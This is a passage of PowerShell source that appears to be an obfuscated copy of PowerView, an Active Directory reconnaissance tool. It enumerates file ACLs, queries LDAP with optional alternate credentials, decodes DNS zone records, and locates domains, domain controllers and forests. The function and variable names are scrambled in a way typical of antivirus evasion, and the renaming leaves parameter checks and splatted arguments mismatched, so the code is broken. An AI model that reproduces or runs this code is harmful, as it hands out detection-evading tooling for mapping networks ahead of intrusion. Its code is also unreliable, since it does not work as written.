[uint32]'0x00000040' = 'DeleteChild' | |
[uint32]'0x00000020' = 'Execute/Traverse' | |
[uint32]'0x00000010' = 'WriteExtendedAttributes' | |
[uint32]'0x00000008' = 'ReadExtendedAttributes' | |
[uint32]'0x00000004' = 'AppendData/AddSubdirectory' | |
[uint32]'0x00000002' = 'WriteData/AddFile' | |
[uint32]'0x00000001' = 'ReadData/ListDirectory' | |
} | |
$KWyzwnwC99 = @{ | |
[uint32]'0x1f01ff' = 'FullControl' | |
[uint32]'0x0301bf' = 'Modify' | |
[uint32]'0x0200a9' = 'ReadAndExecute' | |
[uint32]'0x02019f' = 'ReadAndWrite' | |
[uint32]'0x020089' = 'Read' | |
[uint32]'0x000116' = 'Write' | |
} | |
$cJYblSRr99 = @() | |
$cJYblSRr99 += $KWyzwnwC99.Keys | ForEach-Object { | |
if (($FSR -band $_) -eq $_) { | |
$KWyzwnwC99[$_] | |
$FSR = $FSR -band (-not $_) | |
} | |
} | |
$cJYblSRr99 += $AccessMask.Keys | Where-Object { $FSR -band $_ } | ForEach-Object { $AccessMask[$_] } | |
($cJYblSRr99 | Where-Object {$_}) -join ',' | |
} | |
$pQxPRCuR99 = @{} | |
if ($PSBoundParameters['Credential']) { $pQxPRCuR99['Credential'] = $KWcDeQDF99 } | |
$IrlHyazy99 = @{} | |
} | |
PROCESS { | |
ForEach ($RtHoTVXK99 in $Path) { | |
try { | |
if (($RtHoTVXK99 -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { | |
$tcwSUBNN99 = (New-Object System.Uri($RtHoTVXK99)).Host | |
if (-not $IrlHyazy99[$tcwSUBNN99]) { | |
Andes -MqGzGCsi99 $tcwSUBNN99 -KWcDeQDF99 $KWcDeQDF99 | |
$IrlHyazy99[$tcwSUBNN99] = $True | |
} | |
} | |
$ACL = Get-Acl -Path $RtHoTVXK99 | |
$ACL.GetAccessRules($True, $True, [System.Security.Principal.SecurityIdentifier]) | ForEach-Object { | |
$SID = $_.IdentityReference.Value | |
$Name = Malory -ObjectSID $SID @ConvertArguments | |
$Out = New-Object PSObject | |
$Out | Add-Member Noteproperty 'Path' $RtHoTVXK99 | |
$Out | Add-Member Noteproperty 'FileSystemRights' (realistic -FSR $_.FileSystemRights.value__) | |
$Out | Add-Member Noteproperty 'IdentityReference' $Name | |
$Out | Add-Member Noteproperty 'IdentitySID' $SID | |
$Out | Add-Member Noteproperty 'AccessControlType' $_.AccessControlType | |
$Out.PSObject.TypeNames.Insert(0, 'PowerView.FileACL') | |
$Out | |
} | |
} | |
catch { | |
Write-Verbose "[squalor] error: $_" | |
} | |
} | |
} | |
END { | |
$IrlHyazy99.Keys | bauxite | |
} | |
} | |
function epicure { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('System.Management.Automation.PSCustomObject')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Mandatory = $True, ValueFromPipeline = $True)] | |
[ValidateNotNullOrEmpty()] | |
$nmZxBYze99 | |
) | |
$RJkaQpaQ99 = @{} | |
$nmZxBYze99.PropertyNames | ForEach-Object { | |
if ($_ -ne 'adspath') { | |
if (($_ -eq 'objectsid') -or ($_ -eq 'sidhistory')) { | |
$RJkaQpaQ99[$_] = $nmZxBYze99[$_] | ForEach-Object { (New-Object System.Security.Principal.SecurityIdentifier($_, 0)).Value } | |
} | |
elseif ($_ -eq 'grouptype') { | |
$RJkaQpaQ99[$_] = $nmZxBYze99[$_][0] -as $DIZoncuD99 | |
} | |
elseif ($_ -eq 'samaccounttype') { | |
$RJkaQpaQ99[$_] = $nmZxBYze99[$_][0] -as $ajEJIutB99 | |
} | |
elseif ($_ -eq 'objectguid') { | |
$RJkaQpaQ99[$_] = (New-Object Guid (,$nmZxBYze99[$_][0])).Guid | |
} | |
elseif ($_ -eq 'useraccountcontrol') { | |
$RJkaQpaQ99[$_] = $nmZxBYze99[$_][0] -as $OamCSbsR99 | |
} | |
elseif ($_ -eq 'ntsecuritydescriptor') { | |
$xKKVIJqS99 = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $nmZxBYze99[$_][0], 0 | |
if ($xKKVIJqS99.Owner) { | |
$RJkaQpaQ99['Owner'] = $xKKVIJqS99.Owner | |
} | |
if ($xKKVIJqS99.Group) { | |
$RJkaQpaQ99['Group'] = $xKKVIJqS99.Group | |
} | |
if ($xKKVIJqS99.DiscretionaryAcl) { | |
$RJkaQpaQ99['DiscretionaryAcl'] = $xKKVIJqS99.DiscretionaryAcl | |
} | |
if ($xKKVIJqS99.SystemAcl) { | |
$RJkaQpaQ99['SystemAcl'] = $xKKVIJqS99.SystemAcl | |
} | |
} | |
elseif ($_ -eq 'accountexpires') { | |
if ($nmZxBYze99[$_][0] -gt [DateTime]::MaxValue.Ticks) { | |
$RJkaQpaQ99[$_] = "NEVER" | |
} | |
else { | |
$RJkaQpaQ99[$_] = [datetime]::fromfiletime($nmZxBYze99[$_][0]) | |
} | |
} | |
elseif ( ($_ -eq 'lastlogon') -or ($_ -eq 'lastlogontimestamp') -or ($_ -eq 'pwdlastset') -or ($_ -eq 'lastlogoff') -or ($_ -eq 'badPasswordTime') ) { | |
if ($nmZxBYze99[$_][0] -is [System.MarshalByRefObject]) { | |
$Temp = $nmZxBYze99[$_][0] | |
[Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) | |
[Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) | |
$RJkaQpaQ99[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low))) | |
} | |
else { | |
$RJkaQpaQ99[$_] = ([datetime]::FromFileTime(($nmZxBYze99[$_][0]))) | |
} | |
} | |
elseif ($nmZxBYze99[$_][0] -is [System.MarshalByRefObject]) { | |
$Prop = $nmZxBYze99[$_] | |
try { | |
$Temp = $Prop[$_][0] | |
[Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) | |
[Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) | |
$RJkaQpaQ99[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low) | |
} | |
catch { | |
Write-Verbose "[epicure] error: $_" | |
$RJkaQpaQ99[$_] = $Prop[$_] | |
} | |
} | |
elseif ($nmZxBYze99[$_].count -eq 1) { | |
$RJkaQpaQ99[$_] = $nmZxBYze99[$_][0] | |
} | |
else { | |
$RJkaQpaQ99[$_] = $nmZxBYze99[$_] | |
} | |
} | |
} | |
try { | |
New-Object -TypeName PSObject -Property $RJkaQpaQ99 | |
} | |
catch { | |
Write-Warning "[epicure] Error parsing LDAP properties : $_" | |
} | |
} | |
function Richelieu { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('System.DirectoryServices.DirectorySearcher')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(ValueFromPipeline = $True)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$IHSCVPoz99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99 = 120, | |
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] | |
[String] | |
$FaXdBAYg99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
PROCESS { | |
if ($PSBoundParameters['Domain']) { | |
$ShZaeqLs99 = $ADDDGomQ99 | |
if ($ENV:USERDNSDOMAIN -and ($ENV:USERDNSDOMAIN.Trim() -ne '')) { | |
$VeuSFWRJ99 = $ENV:USERDNSDOMAIN | |
if ($ENV:LOGONSERVER -and ($ENV:LOGONSERVER.Trim() -ne '') -and $VeuSFWRJ99) { | |
$UyEgTzLp99 = "$($ENV:LOGONSERVER -replace '\\','').$VeuSFWRJ99" | |
} | |
} | |
} | |
elseif ($PSBoundParameters['Credential']) { | |
$qhxSYrOx99 = aforethought -KWcDeQDF99 $KWcDeQDF99 | |
$UyEgTzLp99 = ($qhxSYrOx99.PdcRoleOwner).Name | |
$ShZaeqLs99 = $qhxSYrOx99.Name | |
} | |
elseif ($ENV:USERDNSDOMAIN -and ($ENV:USERDNSDOMAIN.Trim() -ne '')) { | |
$ShZaeqLs99 = $ENV:USERDNSDOMAIN | |
if ($ENV:LOGONSERVER -and ($ENV:LOGONSERVER.Trim() -ne '') -and $ShZaeqLs99) { | |
$UyEgTzLp99 = "$($ENV:LOGONSERVER -replace '\\','').$ShZaeqLs99" | |
} | |
} | |
else { | |
write-verbose "get-domain" | |
$qhxSYrOx99 = aforethought | |
$UyEgTzLp99 = ($qhxSYrOx99.PdcRoleOwner).Name | |
$ShZaeqLs99 = $qhxSYrOx99.Name | |
} | |
if ($PSBoundParameters['Server']) { | |
$UyEgTzLp99 = $CbStbNZR99 | |
} | |
$LrtgJmHR99 = 'LDAP://' | |
if ($UyEgTzLp99 -and ($UyEgTzLp99.Trim() -ne '')) { | |
$LrtgJmHR99 += $UyEgTzLp99 | |
if ($ShZaeqLs99) { | |
$LrtgJmHR99 += '/' | |
} | |
} | |
if ($PSBoundParameters['SearchBasePrefix']) { | |
$LrtgJmHR99 += $IHSCVPoz99 + ',' | |
} | |
if ($PSBoundParameters['SearchBase']) { | |
if ($GNYlaBrE99 -Match '^GC://') { | |
$DN = $GNYlaBrE99.ToUpper().Trim('/') | |
$LrtgJmHR99 = '' | |
} | |
else { | |
if ($GNYlaBrE99 -match '^LDAP://') { | |
if ($GNYlaBrE99 -match "LDAP://.+/.+") { | |
$LrtgJmHR99 = '' | |
$DN = $GNYlaBrE99 | |
} | |
else { | |
$DN = $GNYlaBrE99.SubString(7) | |
} | |
} | |
else { | |
$DN = $GNYlaBrE99 | |
} | |
} | |
} | |
else { | |
if ($ShZaeqLs99 -and ($ShZaeqLs99.Trim() -ne '')) { | |
$DN = "DC=$($ShZaeqLs99.Replace('.', ',DC='))" | |
} | |
} | |
$LrtgJmHR99 += $DN | |
Write-Verbose "[Richelieu] search base: $LrtgJmHR99" | |
if ($KWcDeQDF99 -ne [Management.Automation.PSCredential]::Empty) { | |
Write-Verbose "[Richelieu] Using alternate credentials for LDAP connection" | |
$qhxSYrOx99 = New-Object DirectoryServices.DirectoryEntry($LrtgJmHR99, $KWcDeQDF99.UserName, $KWcDeQDF99.GetNetworkCredential().Password) | |
$HXTNsuXQ99 = New-Object System.DirectoryServices.DirectorySearcher($qhxSYrOx99) | |
} | |
else { | |
$HXTNsuXQ99 = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$LrtgJmHR99) | |
} | |
$HXTNsuXQ99.PageSize = $uTURXKBm99 | |
$HXTNsuXQ99.SearchScope = $gEzbtCrD99 | |
$HXTNsuXQ99.CacheResults = $False | |
$HXTNsuXQ99.ReferralChasing = [System.DirectoryServices.ReferralChasingOption]::All | |
if ($PSBoundParameters['ServerTimeLimit']) { | |
$HXTNsuXQ99.ServerTimeLimit = $ucLpCRIr99 | |
} | |
if ($PSBoundParameters['Tombstone']) { | |
$HXTNsuXQ99.Tombstone = $True | |
} | |
if ($PSBoundParameters['LDAPFilter']) { | |
$HXTNsuXQ99.filter = $hzaXgjDv99 | |
} | |
if ($PSBoundParameters['SecurityMasks']) { | |
$HXTNsuXQ99.SecurityMasks = Switch ($FaXdBAYg99) { | |
'Dacl' { [System.DirectoryServices.SecurityMasks]::Dacl } | |
'Group' { [System.DirectoryServices.SecurityMasks]::Group } | |
'None' { [System.DirectoryServices.SecurityMasks]::None } | |
'Owner' { [System.DirectoryServices.SecurityMasks]::Owner } | |
'Sacl' { [System.DirectoryServices.SecurityMasks]::Sacl } | |
} | |
} | |
if ($PSBoundParameters['Properties']) { | |
$CfvLVwHb99 = $nmZxBYze99| ForEach-Object { $_.Split(',') } | |
$Null = $HXTNsuXQ99.PropertiesToLoad.AddRange(($CfvLVwHb99)) | |
} | |
$HXTNsuXQ99 | |
} | |
} | |
function scenarios { | |
[OutputType('System.Management.Automation.PSCustomObject')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, Mandatory = $True, ValueFromPipelineByPropertyName = $True)] | |
[Byte[]] | |
$mWpfqLjc99 | |
) | |
BEGIN { | |
function spindled { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseOutputTypeCorrectly', '')] | |
[CmdletBinding()] | |
Param( | |
[Byte[]] | |
$Raw | |
) | |
[Int]$jlFlRflT99 = $Raw[0] | |
[Int]$AsipnmqT99 = $Raw[1] | |
[Int]$Index = 2 | |
[String]$Name = '' | |
while ($AsipnmqT99-- -gt 0) | |
{ | |
[Int]$LfuLYkRf99 = $Raw[$Index++] | |
while ($LfuLYkRf99-- -gt 0) { | |
$Name += [Char]$Raw[$Index++] | |
} | |
$Name += "." | |
} | |
$Name | |
} | |
} | |
PROCESS { | |
$mmlFkLsM99 = [BitConverter]::ToUInt16($mWpfqLjc99, 2) | |
$rRdJQtRz99 = [BitConverter]::ToUInt32($mWpfqLjc99, 8) | |
$zZWmpvmK99 = $mWpfqLjc99[12..15] | |
$Null = [array]::Reverse($zZWmpvmK99) | |
$TTL = [BitConverter]::ToUInt32($zZWmpvmK99, 0) | |
$Age = [BitConverter]::ToUInt32($mWpfqLjc99, 20) | |
if ($Age -ne 0) { | |
$EjrjbpWU99 = ((Get-Date -Year 1601 -Month 1 -Day 1 -Hour 0 -Minute 0 -Second 0).AddHours($age)).ToString() | |
} | |
else { | |
$EjrjbpWU99 = '[static]' | |
} | |
$pTzCSXXx99 = New-Object PSObject | |
if ($mmlFkLsM99 -eq 1) { | |
$IP = "{0}.{1}.{2}.{3}" -f $mWpfqLjc99[24], $mWpfqLjc99[25], $mWpfqLjc99[26], $mWpfqLjc99[27] | |
$Data = $IP | |
$pTzCSXXx99 | Add-Member Noteproperty 'RecordType' 'A' | |
} | |
elseif ($mmlFkLsM99 -eq 2) { | |
$GXOMSqUN99 = spindled $mWpfqLjc99[24..$mWpfqLjc99.length] | |
$Data = $GXOMSqUN99 | |
$pTzCSXXx99 | Add-Member Noteproperty 'RecordType' 'NS' | |
} | |
elseif ($mmlFkLsM99 -eq 5) { | |
$Alias = spindled $mWpfqLjc99[24..$mWpfqLjc99.length] | |
$Data = $Alias | |
$pTzCSXXx99 | Add-Member Noteproperty 'RecordType' 'CNAME' | |
} | |
elseif ($mmlFkLsM99 -eq 6) { | |
$Data = $([System.Convert]::ToBase64String($mWpfqLjc99[24..$mWpfqLjc99.length])) | |
$pTzCSXXx99 | Add-Member Noteproperty 'RecordType' 'SOA' | |
} | |
elseif ($mmlFkLsM99 -eq 12) { | |
$Ptr = spindled $mWpfqLjc99[24..$mWpfqLjc99.length] | |
$Data = $Ptr | |
$pTzCSXXx99 | Add-Member Noteproperty 'RecordType' 'PTR' | |
} | |
elseif ($mmlFkLsM99 -eq 13) { | |
$Data = $([System.Convert]::ToBase64String($mWpfqLjc99[24..$mWpfqLjc99.length])) | |
$pTzCSXXx99 | Add-Member Noteproperty 'RecordType' 'HINFO' | |
} | |
elseif ($mmlFkLsM99 -eq 15) { | |
$Data = $([System.Convert]::ToBase64String($mWpfqLjc99[24..$mWpfqLjc99.length])) | |
$pTzCSXXx99 | Add-Member Noteproperty 'RecordType' 'MX' | |
} | |
elseif ($mmlFkLsM99 -eq 16) { | |
[string]$TXT = '' | |
[int]$LfuLYkRf99 = $mWpfqLjc99[24] | |
$Index = 25 | |
while ($LfuLYkRf99-- -gt 0) { | |
$TXT += [char]$mWpfqLjc99[$index++] | |
} | |
$Data = $TXT | |
$pTzCSXXx99 | Add-Member Noteproperty 'RecordType' 'TXT' | |
} | |
elseif ($mmlFkLsM99 -eq 28) { | |
$Data = $([System.Convert]::ToBase64String($mWpfqLjc99[24..$mWpfqLjc99.length])) | |
$pTzCSXXx99 | Add-Member Noteproperty 'RecordType' 'AAAA' | |
} | |
elseif ($mmlFkLsM99 -eq 33) { | |
$Data = $([System.Convert]::ToBase64String($mWpfqLjc99[24..$mWpfqLjc99.length])) | |
$pTzCSXXx99 | Add-Member Noteproperty 'RecordType' 'SRV' | |
} | |
else { | |
$Data = $([System.Convert]::ToBase64String($mWpfqLjc99[24..$mWpfqLjc99.length])) | |
$pTzCSXXx99 | Add-Member Noteproperty 'RecordType' 'UNKNOWN' | |
} | |
$pTzCSXXx99 | Add-Member Noteproperty 'UpdatedAtSerial' $rRdJQtRz99 | |
$pTzCSXXx99 | Add-Member Noteproperty 'TTL' $TTL | |
$pTzCSXXx99 | Add-Member Noteproperty 'Age' $Age | |
$pTzCSXXx99 | Add-Member Noteproperty 'TimeStamp' $EjrjbpWU99 | |
$pTzCSXXx99 | Add-Member Noteproperty 'Data' $Data | |
$pTzCSXXx99 | |
} | |
} | |
function snivel { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.DNSZone')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Alias('ReturnOne')] | |
[Switch] | |
$YIVtKGKK99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
PROCESS { | |
$ufgcNRNN99 = @{ | |
'LDAPFilter' = '(objectClass=dnsZone)' | |
} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['Properties']) { $ufgcNRNN99['Properties'] = $nmZxBYze99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$uQfnWyMN99 = Richelieu @SearcherArguments | |
if ($uQfnWyMN99) { | |
if ($PSBoundParameters['FindOne']) { $hCEVDJUr99 = $uQfnWyMN99.FindOne() } | |
else { $hCEVDJUr99 = $uQfnWyMN99.FindAll() } | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
$Out = epicure -nmZxBYze99 $_.Properties | |
$Out | Add-Member NoteProperty 'ZoneName' $Out.name | |
$Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSZone') | |
$Out | |
} | |
if ($hCEVDJUr99) { | |
try { $hCEVDJUr99.dispose() } | |
catch { | |
Write-Verbose "[privileges] Error disposing of the Results object: $_" | |
} | |
} | |
$uQfnWyMN99.dispose() | |
} | |
$ufgcNRNN99['SearchBasePrefix'] = 'CN=MicrosoftDNS,DC=DomainDnsZones' | |
$rxCxvJSO99 = Richelieu @SearcherArguments | |
if ($rxCxvJSO99) { | |
try { | |
if ($PSBoundParameters['FindOne']) { $hCEVDJUr99 = $rxCxvJSO99.FindOne() } | |
else { $hCEVDJUr99 = $rxCxvJSO99.FindAll() } | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
$Out = epicure -nmZxBYze99 $_.Properties | |
$Out | Add-Member NoteProperty 'ZoneName' $Out.name | |
$Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSZone') | |
$Out | |
} | |
if ($hCEVDJUr99) { | |
try { $hCEVDJUr99.dispose() } | |
catch { | |
Write-Verbose "[snivel] Error disposing of the Results object: $_" | |
} | |
} | |
} | |
catch { | |
Write-Verbose "[snivel] Error accessing 'CN=MicrosoftDNS,DC=DomainDnsZones'" | |
} | |
$rxCxvJSO99.dispose() | |
} | |
} | |
} | |
function mournfully { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.DNSRecord')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$hfTfhDHe99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99 = 'name,distinguishedname,dnsrecord,whencreated,whenchanged', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Alias('ReturnOne')] | |
[Switch] | |
$YIVtKGKK99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
PROCESS { | |
$ufgcNRNN99 = @{ | |
'LDAPFilter' = '(objectClass=dnsNode)' | |
'SearchBasePrefix' = "DC=$($hfTfhDHe99),CN=MicrosoftDNS,DC=DomainDnsZones" | |
} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['Properties']) { $ufgcNRNN99['Properties'] = $nmZxBYze99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$ZPNvFlQr99 = Richelieu @SearcherArguments | |
if ($ZPNvFlQr99) { | |
if ($PSBoundParameters['FindOne']) { $hCEVDJUr99 = $ZPNvFlQr99.FindOne() } | |
else { $hCEVDJUr99 = $ZPNvFlQr99.FindAll() } | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
try { | |
$Out = epicure -nmZxBYze99 $_.Properties | Select-Object name,distinguishedname,dnsrecord,whencreated,whenchanged | |
$Out | Add-Member NoteProperty 'ZoneName' $hfTfhDHe99 | |
if ($Out.dnsrecord -is [System.DirectoryServices.ResultPropertyValueCollection]) { | |
$VXTTewei99 = scenarios -mWpfqLjc99 $Out.dnsrecord[0] | |
} | |
else { | |
$VXTTewei99 = scenarios -mWpfqLjc99 $Out.dnsrecord | |
} | |
if ($VXTTewei99) { | |
$VXTTewei99.PSObject.Properties | ForEach-Object { | |
$Out | Add-Member NoteProperty $_.Name $_.Value | |
} | |
} | |
$Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSRecord') | |
$Out | |
} | |
catch { | |
Write-Warning "[mournfully] Error: $_" | |
$Out | |
} | |
} | |
if ($hCEVDJUr99) { | |
try { $hCEVDJUr99.dispose() } | |
catch { | |
Write-Verbose "[mournfully] Error disposing of the Results object: $_" | |
} | |
} | |
$ZPNvFlQr99.dispose() | |
} | |
} | |
} | |
function aforethought { | |
[OutputType([System.DirectoryServices.ActiveDirectory.Domain])] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
PROCESS { | |
if ($PSBoundParameters['Credential']) { | |
Write-Verbose '[aforethought] Using alternate credentials for aforethought' | |
if ($PSBoundParameters['Domain']) { | |
$ShZaeqLs99 = $ADDDGomQ99 | |
} | |
else { | |
$ShZaeqLs99 = $KWcDeQDF99.GetNetworkCredential().Domain | |
Write-Verbose "[aforethought] Extracted domain '$ShZaeqLs99' from -KWcDeQDF99" | |
} | |
$mdVpIaep99 = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $ShZaeqLs99, $KWcDeQDF99.UserName, $KWcDeQDF99.GetNetworkCredential().Password) | |
try { | |
[System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($mdVpIaep99) | |
} | |
catch { | |
Write-Verbose "[aforethought] The specified domain '$ShZaeqLs99' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_" | |
} | |
} | |
elseif ($PSBoundParameters['Domain']) { | |
$mdVpIaep99 = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $ADDDGomQ99) | |
try { | |
[System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($mdVpIaep99) | |
} | |
catch { | |
Write-Verbose "[aforethought] The specified domain '$ADDDGomQ99' does not exist, could not be contacted, or there isn't an existing trust : $_" | |
} | |
} | |
else { | |
try { | |
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() | |
} | |
catch { | |
Write-Verbose "[aforethought] Error retrieving the current domain: $_" | |
} | |
} | |
} | |
} | |
function Moloch { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.Computer')] | |
[OutputType('System.DirectoryServices.ActiveDirectory.DomainController')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True)] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[Switch] | |
$LDAP, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
PROCESS { | |
$LYGCPrDZ99 = @{} | |
if ($PSBoundParameters['Domain']) { $LYGCPrDZ99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Credential']) { $LYGCPrDZ99['Credential'] = $KWcDeQDF99 } | |
if ($PSBoundParameters['LDAP'] -or $PSBoundParameters['Server']) { | |
if ($PSBoundParameters['Server']) { $LYGCPrDZ99['Server'] = $CbStbNZR99 } | |
$LYGCPrDZ99['LDAPFilter'] = '(userAccountControl:1.2.840.113556.1.4.803:=8192)' | |
deputes @Arguments | |
} | |
else { | |
$eZLXMuUG99 = aforethought @Arguments | |
if ($eZLXMuUG99) { | |
$eZLXMuUG99.DomainControllers | |
} | |
} | |
} | |
} | |
function truthers { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('System.Management.Automation.PSCustomObject')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$hntgZzeP99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
PROCESS { | |
if ($PSBoundParameters['Credential']) { | |
Write-Verbose "[truthers] Using alternate credentials for truthers" | |
if ($PSBoundParameters['Forest']) { | |
$oheZebYI99 = $hntgZzeP99 | |
} | |
else { | |
$oheZebYI99 = $KWcDeQDF99.GetNetworkCredential().Domain | |
Write-Verbose "[truthers] Extracted domain '$hntgZzeP99' from -KWcDeQDF99" | |
} | |
$eQBBUjHm99 = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $oheZebYI99, $KWcDeQDF99.UserName, $KWcDeQDF99.GetNetworkCredential().Password) | |
try { | |
$mhDlMuXg99 = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($eQBBUjHm99) | |
} | |
catch { | |
Write-Verbose "[truthers] The specified forest '$oheZebYI99' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_" | |
$Null | |
} | |
} | |
elseif ($PSBoundParameters['Forest']) { | |
$eQBBUjHm99 = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $hntgZzeP99) | |
try { | |
$mhDlMuXg99 = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($eQBBUjHm99) | |
} | |
catch { | |
Write-Verbose "[truthers] The specified forest '$hntgZzeP99' does not exist, could not be contacted, or there isn't an existing trust: $_" | |
return $Null | |
} | |
} | |
else { | |
$mhDlMuXg99 = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() | |
} | |
if ($mhDlMuXg99) { | |
if ($PSBoundParameters['Credential']) { | |
